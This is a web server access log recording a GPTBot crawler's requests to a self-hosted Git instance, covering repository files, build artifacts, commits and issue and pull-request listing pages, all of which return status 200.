"/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:18:41:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/main.py" [Client 74.7.227.38] [Length 334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:18:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 11205] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:18:41:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 11204] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:18:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13196] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:41:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13197] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13201] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13195] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 74.7.227.38] [Length 13198] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:18:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" -[17/Feb/2026:18:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:18:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:18:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=open&type=all" -[17/Feb/2026:18:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fOpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 23494] [Gzip 4.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:18:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/tags" [Client 74.7.227.38] [Length 7719] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:18:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:18:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=oldest&state=all&type=all" -[17/Feb/2026:18:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:18:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" -[17/Feb/2026:18:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:18:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:41:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:41:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:41:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10262] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:41:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10259] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:41:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" -[17/Feb/2026:18:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10131] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:41:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:18:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:18:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10120] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 